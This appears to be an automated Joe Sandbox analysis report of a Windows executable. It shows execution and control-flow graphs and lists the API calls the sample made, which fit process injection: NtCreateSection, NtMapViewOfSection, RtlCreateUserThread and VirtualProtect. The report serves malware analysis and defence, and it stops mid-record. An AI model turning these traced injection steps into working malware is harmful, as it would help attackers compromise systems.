                                                                                                            execution_graph 3971 8e0d4e 3972 8e0d52 3971->3972 3974 8e0d5e 3971->3974 3975 8e0d5f 3972->3975 3976 8e0d6e 3975->3976 3979 8e14ff 3976->3979 3980 8e151a 3979->3980 3981 8e1523 CreateToolhelp32Snapshot 3980->3981 3982 8e153f Module32First 3980->3982 3981->3980 3981->3982 3983 8e154e 3982->3983 3985 8e0d77 3982->3985 3986 8e11be 3983->3986 3985->3974 3987 8e11e9 3986->3987 3988 8e11fa VirtualAlloc 3987->3988 3989 8e1232 3987->3989 3988->3989 3989->3989 4192 6a092b GetPEB 4193 6a0972 4192->4193 4098 402e42 4099 402e47 4098->4099 4100 402f18 4099->4100 4102 4020ea NtQuerySystemInformation 4099->4102 4103 402f4c 4099->4103 4101 401902 8 API calls 4100->4101 4100->4103 4101->4103 4102->4100 4257 418986 4258 418990 4257->4258 4259 418940 SetPriorityClass 4258->4259 4260 4189ad 4258->4260 4259->4258 4206 40190e 4207 401912 4206->4207 4209 4018b5 4206->4209 4208 401946 Sleep 4207->4208 4210 401961 4208->4210 4211 401529 7 API calls 4210->4211 4212 401972 4210->4212 4211->4212 3990 418ed0 3993 418a70 3990->3993 3992 418ed5 3994 418a7d 3993->3994 3995 418b80 7 API calls 3994->3995 3996 418cc6 3994->3996 3998 418bf8 7 API calls 3995->3998 3997 418cd4 SetCommState 3996->3997 4001 418ced 3996->4001 3997->3996 3999 418ca4 3998->3999 4000 418c98 ObjectPrivilegeAuditAlarmW 3998->4000 4002 418cb5 3999->4002 4003 418cad WaitForSingleObject 3999->4003 4000->3999 4004 418daa 4001->4004 4005 418cfa 9 API calls 4001->4005 4002->3996 4003->4002 4017 418740 LocalAlloc 4004->4017 4012 418d88 4005->4012 4009 418daf LoadLibraryA 4018 418770 GetModuleHandleW GetProcAddress VirtualProtect 4009->4018 4010 418dfd 4019 4189d0 4010->4019 4012->4004 4013 418e02 4014 418e43 InterlockedCompareExchange 4013->4014 4015 418e23 MoveFileW 4013->4015 4016 418e5d 4013->4016 4014->4013 4015->4013 4016->3992 4017->4009 4018->4010 4020 4189f9 QueryDosDeviceW 4019->4020 4021 418a0a 4019->4021 4020->4021 4030 418910 4021->4030 4024 418a25 4033 418950 4024->4033 4025 418a1d FreeEnvironmentStringsA 4025->4024 4028 418a57 4028->4013 4029 418a3c HeapCreate GetNumaProcessorNode 4029->4028 4031 418921 FatalAppExitA GetModuleHandleA 4030->4031 4032 418933 4030->4032 4031->4032 4032->4024 4032->4025 4034 41896c 4033->4034 4035 41895e BuildCommDCBA 4033->4035 4036 418974 FreeEnvironmentStringsA 4034->4036 4039 41897c 4034->4039 4035->4039 4036->4039 4037 4189ad 4037->4028 4037->4029 4039->4037 4040 418940 4039->4040 4043 4188c0 4040->4043 4044 4188eb 4043->4044 4045 4188dc SetPriorityClass 4043->4045 4044->4039 4045->4044 4046 6a003c 4047 6a0049 4046->4047 4059 6a0e0f SetErrorMode SetErrorMode 4047->4059 4052 6a0265 4053 6a02ce VirtualProtect 4052->4053 4055 6a030b 4053->4055 4054 6a0439 VirtualFree 4058 6a04be LoadLibraryA 4054->4058 4055->4054 4057 6a08c7 4058->4057 4060 6a0223 4059->4060 4061 6a0d90 4060->4061 4062 6a0dad 4061->4062 4063 6a0dbb GetPEB 4062->4063 4064 6a0238 VirtualAlloc 4062->4064 4063->4064 4064->4052 4110 4014db 4111 40148f 4110->4111 4114 401469 4110->4114 4111->4110 4112 4015d5 NtDuplicateObject 4111->4112 4111->4114 4113 4015f2 NtCreateSection 4112->4113 4112->4114 4115 401672 NtCreateSection 4113->4115 4116 401618 NtMapViewOfSection 4113->4116 4115->4114 4117 40169e 4115->4117 4116->4115 4118 40163b NtMapViewOfSection 4116->4118 4117->4114 4119 4016a8 NtMapViewOfSection 4117->4119 4118->4115 4121 401659 4118->4121 4119->4114 4120 4016cf NtMapViewOfSection 4119->4120 4120->4114 4121->4115 4217 401922 4218 401930 4217->4218 4219 401946 Sleep 4218->4219 4220 401961 4219->4220 4221 401529 7 API calls 4220->4221 4222 401972 4220->4222 4221->4222 4239 401534 4240 401546 4239->4240 4241 4015d5 NtDuplicateObject 4240->4241 4248 4016f1 4240->4248 4242 4015f2 NtCreateSection 4241->4242 4241->4248 4243 401672 NtCreateSection 4242->4243 4244 401618 NtMapViewOfSection 4242->4244 4245 40169e 4243->4245 4243->4248 4244->4243 4246 40163b NtMapViewOfSection 4244->4246 4247 4016a8 NtMapViewOfSection 4245->4247 4245->4248 4246->4243 4249 401659 4246->4249 4247->4248 4250 4016cf NtMapViewOfSection 4247->4250 4249->4243 4250->4248 4065 402ffa 4066 403024 4065->4066 4067 40313d 4065->4067 4066->4067 4068 4030df RtlCreateUserThread NtTerminateProcess 4066->4068 4068->4067 4069 402ebc 4072 402eb4 4069->4072 4070 402f18 4074 402f4c 4070->4074 4080 401902 4070->4080 4072->4070 4072->4074 4075 4020ea 4072->4075 4076 4020fb 4075->4076 4077 40214e 4076->4077 4078 402152 NtQuerySystemInformation 4076->4078 4079 40216e 4076->4079 4077->4076 4077->4078 4078->4077 4079->4070 4081 401913 4080->4081 4082 401946 Sleep 4081->4082 4083 401961 4082->4083 4085 401972 4083->4085 4086 401529 4083->4086 4085->4074 4087 401539 4086->4087 4088 4015d5 NtDuplicateObject 4087->4088 4095 4016f1 4087->4095 4089 4015f2 NtCreateSection 4088->4089 4088->4095 4090 401672 NtCreateSection 4089->4090 4091 401618 NtMapViewOfSection 4089->4091 4092 40169e 4090->4092 4090->4095 4091->4090 4093 40163b NtMapViewOfSection 4091->4093 4094 4016a8 NtMapViewOfSection 4092->4094 4092->4095 4093->4090 4096 401659 4093->4096 4094->4095 4097 4016cf NtMapViewOfSection 4094->4097 4095->4085 4096->4090 4097->4095 4122 4020fc 4123 402107 4122->4123 4124 402152 NtQuerySystemInformation 4123->4124 4125 40216e 4123->4125 4124->4123

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 418a70-418a98 2 418aa0-418aa7 0->2 3 418ad4-418ada 2->3 4 418aa9-418ad0 2->4 5 418adc-418ae8 3->5 6 418aee-418af8 3->6 4->3 5->6 7 418b33-418b3a 6->7 8 418afa-418b29 6->8 7->2 9 418b40-418b46 7->9 8->7 11 418b48-418b4e 9->11 12 418b50-418b56 11->12 13 418b5c-418b66 11->13 12->13 14 418b68 13->14 15 418b6a-418b71 13->15 14->15 15->11 16 418b73-418b7a 15->16 17 418b80-418c96 InterlockedCompareExchange GetFocus ReadConsoleA FindAtomA SearchPathA SetConsoleMode SearchPathW GetDefaultCommConfigA CopyFileExW CreatePipe GetEnvironmentStringsW WriteConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 16->17 18 418cc6-418cd2 16->18 22 418ca4-418cab 17->22 23 418c98-418c9e ObjectPrivilegeAuditAlarmW 17->23 19 418cd4-418ce2 SetCommState 18->19 24 418ce4-418ceb 19->24 25 418ced-418cf4 19->25 26 418cb5-418cc3 22->26 27 418cad-418caf WaitForSingleObject 22->27 23->22 24->19 24->25 28 418daa-418db9 call 418740 25->28 29 418cfa-418da4 GetConsoleAliasesLengthW GetComputerNameA CopyFileW GetFileAttributesA GetConsoleAliasExesLengthW GetBinaryType FormatMessageA GetLongPathNameA PurgeComm 25->29 26->18 27->26 34 418dbb-418dcc 28->34 35 418ded-418df8 LoadLibraryA call 418770 28->35 29->28 37 418dd0-418de0 34->37 42 418dfd-418e0e call 4189d0 35->42 40 418de2 37->40 41 418de8-418deb 37->41 40->41 41->35 41->37 46 418e10-418e17 42->46 48 418e19-418e27 MoveFileW 46->48 49 418e2d-418e33 46->49 48->49 50 418e35 call 418760 49->50 51 418e3a-418e41 49->51 50->51 54 418e43-418e4e InterlockedCompareExchange 51->54 55 418e54-418e5b 51->55 54->55 55->46 57 418e5d-418e6d 55->57 59 418e70-418e80 57->59 60 418e82 59->60 61 418e89-418e8c 59->61 60->61 61->59 62 418e8e-418e99 61->62 63 418ea0-418ea5 62->63 64 418ea7-418ead 63->64 65 418eaf-418eb5 63->65 64->65 66 418eb7-418ec4 64->66 65->63 65->66
                                                                                                            APIs
                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418B8B
                                                                                                            • GetFocus.USER32 ref: 00418B91
                                                                                                            • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418B9E
                                                                                                            • FindAtomA.KERNEL32(00000000), ref: 00418BA5
                                                                                                            • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BBD
                                                                                                            • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00418BC5
                                                                                                            • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BDD
                                                                                                            • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418C04
                                                                                                            • CopyFileExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C10
                                                                                                            • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418C26
                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00418C2C
                                                                                                            • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418C71
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00418C80
                                                                                                            • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418C89
                                                                                                            • ObjectPrivilegeAuditAlarmW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C9E
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418CAF
                                                                                                            • SetCommState.KERNELBASE(00000000,00000000), ref: 00418CD8
                                                                                                            • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00418D09
                                                                                                            • GetComputerNameA.KERNEL32(?,?), ref: 00418D1D
                                                                                                            • CopyFileW.KERNEL32(0041A3AC,0041A380,00000000), ref: 00418D2E
                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00418D35
                                                                                                            • GetConsoleAliasExesLengthW.KERNEL32 ref: 00418D3B
                                                                                                            • GetBinaryType.KERNEL32(0041A3C8,?), ref: 00418D4D
                                                                                                            • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00418D60
                                                                                                            • GetLongPathNameA.KERNEL32(0041A3E4,?,00000000), ref: 00418D73
                                                                                                            • PurgeComm.KERNEL32(00000000,00000000), ref: 00418D7B
                                                                                                            • LoadLibraryA.KERNELBASE(0041A3EC), ref: 00418DF2
                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00418E27
                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418E4E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425704259.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_40b000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleFile$CommNamePath$CompareCopyExchangeInterlockedLengthObjectSearch$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryComputerConfigCreateDefaultEnvironmentExesFindFocusFormatLibraryLoadLongMessageModeModuleMoveOutputPipePrivilegePurgeReadSingleStateStringsSystemTimeTypeWaitWrite
                                                                                                            • String ID: k`$}$
                                                                                                            • API String ID: 2220722107-956986773
                                                                                                            • Opcode ID: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
                                                                                                            • Instruction ID: 0c0e40555d578e92a9f225f047ccd42c64e3c90cdaccad76b264c498dc6ec0a1
                                                                                                            • Opcode Fuzzy Hash: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
                                                                                                            • Instruction Fuzzy Hash: 9FB1A0B1901224ABCB219B65EC58EDF7B78EF49350F00816EF649A3150DB785EC4CFA9

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 68 4014db-4014e7 69 401486-40148b 68->69 70 4014e9 68->70 71 401550-401569 70->71 72 4014eb 70->72 77 40155d-40156c call 4011a4 71->77 74 40155a 72->74 75 4014ed-4014fb 72->75 74->77 80 40149a-4014a8 75->80 81 4014fd-4014ff 75->81 84 40156e-40157f 77->84 85 4014c1-4014c8 80->85 83 401501 81->83 81->84 88 401504-401518 83->88 89 40148f 83->89 86 401581 84->86 87 401584-401589 84->87 91 401469-401485 call 4011a4 85->91 92 4014ca 85->92 86->87 97 4018a6-4018ae 87->97 98 40158f-4015a0 87->98 88->85 90 40151a 88->90 89->80 94 401539-401555 90->94 95 40151c-401526 90->95 91->69 92->68 94->71 97->87 106 4018a4-4018b3 98->106 107 4015a6-4015cf 98->107 109 4018c8 106->109 110 4018b9-4018c4 106->110 107->106 116 4015d5-4015ec NtDuplicateObject 107->116 109->110 112 4018cb-4018ff call 4011a4 109->112 110->112 116->106 118 4015f2-401616 NtCreateSection 116->118 120 401672-401698 NtCreateSection 118->120 121 401618-401639 NtMapViewOfSection 118->121 120->106 122 40169e-4016a2 120->122 121->120 124 40163b-401657 NtMapViewOfSection 121->124 122->106 125 4016a8-4016c9 NtMapViewOfSection 122->125 124->120 127 401659-40166f 124->127 125->106 128 4016cf-4016eb NtMapViewOfSection 125->128 127->120 128->106 131 4016f1 call 4016f6 128->131
                                                                                                            APIs
                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425653193.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Section$CreateDuplicateObjectView
                                                                                                            • String ID: 1
                                                                                                            • API String ID: 1652636561-2212294583
                                                                                                            • Opcode ID: a3d0a89ba2f0946d3c73b933561f00ce793550d5be3e53aacc3d784ec313288b
                                                                                                            • Instruction ID: 7f4d7c4657737381e02ab4131f106e217a3bc84f51a1891dc43a423f49ad99c1
                                                                                                            • Opcode Fuzzy Hash: a3d0a89ba2f0946d3c73b933561f00ce793550d5be3e53aacc3d784ec313288b
                                                                                                            • Instruction Fuzzy Hash: 14718D71A00205FFEB209F91CC49FEF7BB8EF85B10F14412AF912BA2E5D6759905CA58

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 219 401529-401532 220 401543 219->220 221 401539-40153f 219->221 220->221 222 401546-40157f call 4011a4 220->222 221->222 232 401581 222->232 233 401584-401589 222->233 232->233 235 4018a6-4018ae 233->235 236 40158f-4015a0 233->236 235->233 239 4018a4-4018b3 236->239 240 4015a6-4015cf 236->240 242 4018c8 239->242 243 4018b9-4018c4 239->243 240->239 249 4015d5-4015ec NtDuplicateObject 240->249 242->243 245 4018cb-4018ff call 4011a4 242->245 243->245 249->239 251 4015f2-401616 NtCreateSection 249->251 253 401672-401698 NtCreateSection 251->253 254 401618-401639 NtMapViewOfSection 251->254 253->239 255 40169e-4016a2 253->255 254->253 257 40163b-401657 NtMapViewOfSection 254->257 255->239 258 4016a8-4016c9 NtMapViewOfSection 255->258 257->253 260 401659-40166f 257->260 258->239 261 4016cf-4016eb NtMapViewOfSection 258->261 260->253 261->239 264 4016f1 call 4016f6 261->264
                                                                                                            APIs
                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425653193.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                            • String ID:
                                                                                                            • API String ID: 1546783058-0
                                                                                                            • Opcode ID: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                                                                                                            • Instruction ID: 138ec7ca1e8744eb65f40bd9736a53a73cefe8eecd72c79945fcbf62a21b6401
                                                                                                            • Opcode Fuzzy Hash: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                                                                                                            • Instruction Fuzzy Hash: D9616E71900205FBEB209F95DC49FEB7BB8FF81B00F14412AFA12BA1E4D6749A05DB65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 267 401534-40157f call 4011a4 278 401581 267->278 279 401584-401589 267->279 278->279 281 4018a6-4018ae 279->281 282 40158f-4015a0 279->282 281->279 285 4018a4-4018b3 282->285 286 4015a6-4015cf 282->286 288 4018c8 285->288 289 4018b9-4018c4 285->289 286->285 295 4015d5-4015ec NtDuplicateObject 286->295 288->289 291 4018cb-4018ff call 4011a4 288->291 289->291 295->285 297 4015f2-401616 NtCreateSection 295->297 299 401672-401698 NtCreateSection 297->299 300 401618-401639 NtMapViewOfSection 297->300 299->285 301 40169e-4016a2 299->301 300->299 303 40163b-401657 NtMapViewOfSection 300->303 301->285 304 4016a8-4016c9 NtMapViewOfSection 301->304 303->299 306 401659-40166f 303->306 304->285 307 4016cf-4016eb NtMapViewOfSection 304->307 306->299 307->285 310 4016f1 call 4016f6 307->310
                                                                                                            APIs
                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425653193.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                            • String ID:
                                                                                                            • API String ID: 1546783058-0
                                                                                                            • Opcode ID: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                                                                                                            • Instruction ID: 46ca3ae5353e1b2bf85c7e7487c0bf4a09c0837efea8bedcf4105f5ea6450319
                                                                                                            • Opcode Fuzzy Hash: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                                                                                                            • Instruction Fuzzy Hash: 81512971900245BFEF209F91CC48FEB7BB8EF85B00F14416AF912BA1A5D6749945CB24

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 313 401541-401543 315 401546-40157f call 4011a4 313->315 316 401539-40153f 313->316 326 401581 315->326 327 401584-401589 315->327 316->315 326->327 329 4018a6-4018ae 327->329 330 40158f-4015a0 327->330 329->327 333 4018a4-4018b3 330->333 334 4015a6-4015cf 330->334 336 4018c8 333->336 337 4018b9-4018c4 333->337 334->333 343 4015d5-4015ec NtDuplicateObject 334->343 336->337 339 4018cb-4018ff call 4011a4 336->339 337->339 343->333 345 4015f2-401616 NtCreateSection 343->345 347 401672-401698 NtCreateSection 345->347 348 401618-401639 NtMapViewOfSection 345->348 347->333 349 40169e-4016a2 347->349 348->347 351 40163b-401657 NtMapViewOfSection 348->351 349->333 352 4016a8-4016c9 NtMapViewOfSection 349->352 351->347 354 401659-40166f 351->354 352->333 355 4016cf-4016eb NtMapViewOfSection 352->355 354->347 355->333 358 4016f1 call 4016f6 355->358
                                                                                                            APIs
                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425653193.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                            • String ID:
                                                                                                            • API String ID: 1546783058-0
                                                                                                            • Opcode ID: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                                            • Instruction ID: 68c08b8250816e380b35483fe5a52fcf5a4ffa7bf922b91d474b11e8be87ed95
                                                                                                            • Opcode Fuzzy Hash: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                                            • Instruction Fuzzy Hash: 99512AB1900205BFEF209F95CC48FEB7BB8EF85B10F14412AFA12BA1E5D6749945CB24

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 361 401545-40157f call 4011a4 369 401581 361->369 370 401584-401589 361->370 369->370 372 4018a6-4018ae 370->372 373 40158f-4015a0 370->373 372->370 376 4018a4-4018b3 373->376 377 4015a6-4015cf 373->377 379 4018c8 376->379 380 4018b9-4018c4 376->380 377->376 386 4015d5-4015ec NtDuplicateObject 377->386 379->380 382 4018cb-4018ff call 4011a4 379->382 380->382 386->376 388 4015f2-401616 NtCreateSection 386->388 390 401672-401698 NtCreateSection 388->390 391 401618-401639 NtMapViewOfSection 388->391 390->376 392 40169e-4016a2 390->392 391->390 394 40163b-401657 NtMapViewOfSection 391->394 392->376 395 4016a8-4016c9 NtMapViewOfSection 392->395 394->390 397 401659-40166f 394->397 395->376 398 4016cf-4016eb NtMapViewOfSection 395->398 397->390 398->376 401 4016f1 call 4016f6 398->401
                                                                                                            APIs
                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425653193.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                            • String ID:
                                                                                                            • API String ID: 1546783058-0
                                                                                                            • Opcode ID: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                                                                                                            • Instruction ID: b5c9534ba5f5358dff2a074a80b826bd55324152c05987841a878028393b6fdb
                                                                                                            • Opcode Fuzzy Hash: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                                                                                                            • Instruction Fuzzy Hash: 94513AB1900245BFEF209F95CC48FEF7BB8EF85B00F14415AF911BA2A5D6749945CB24

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 404 401553-40157f call 4011a4 411 401581 404->411 412 401584-401589 404->412 411->412 414 4018a6-4018ae 412->414 415 40158f-4015a0 412->415 414->412 418 4018a4-4018b3 415->418 419 4015a6-4015cf 415->419 421 4018c8 418->421 422 4018b9-4018c4 418->422 419->418 428 4015d5-4015ec NtDuplicateObject 419->428 421->422 424 4018cb-4018ff call 4011a4 421->424 422->424 428->418 430 4015f2-401616 NtCreateSection 428->430 432 401672-401698 NtCreateSection 430->432 433 401618-401639 NtMapViewOfSection 430->433 432->418 434 40169e-4016a2 432->434 433->432 436 40163b-401657 NtMapViewOfSection 433->436 434->418 437 4016a8-4016c9 NtMapViewOfSection 434->437 436->432 439 401659-40166f 436->439 437->418 440 4016cf-4016eb NtMapViewOfSection 437->440 439->432 440->418 443 4016f1 call 4016f6 440->443
                                                                                                            APIs
                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425653193.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                            • String ID:
                                                                                                            • API String ID: 1546783058-0
                                                                                                            • Opcode ID: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                                                                                                            • Instruction ID: 8d6641cc39e0a23de402a6cd7af9a8bcce9404ceaedab19c941a5a8b34b5f284
                                                                                                            • Opcode Fuzzy Hash: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                                                                                                            • Instruction Fuzzy Hash: 8C5119B1900205BFEF209F95CC48FEFBBB8EF85B00F14411AFA11AA2A5D6759945CB24

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 447 402ffa-40301e 448 403024-40303c 447->448 449 40313d-403142 447->449 448->449 450 403042-403053 448->450 451 403055-40305e 450->451 452 403063-403071 451->452 452->452 453 403073-40307a 452->453 454 40309c-4030a3 453->454 455 40307c-40309b 453->455 456 4030c5-4030c8 454->456 457 4030a5-4030c4 454->457 455->454 458 4030d1 456->458 459 4030ca-4030cd 456->459 457->456 458->451 461 4030d3-4030d8 458->461 459->458 460 4030cf 459->460 460->461 461->449 462 4030da-4030dd 461->462 462->449 463 4030df-40313a RtlCreateUserThread NtTerminateProcess 462->463 463->449
                                                                                                            APIs
                                                                                                            Memory Dump Source
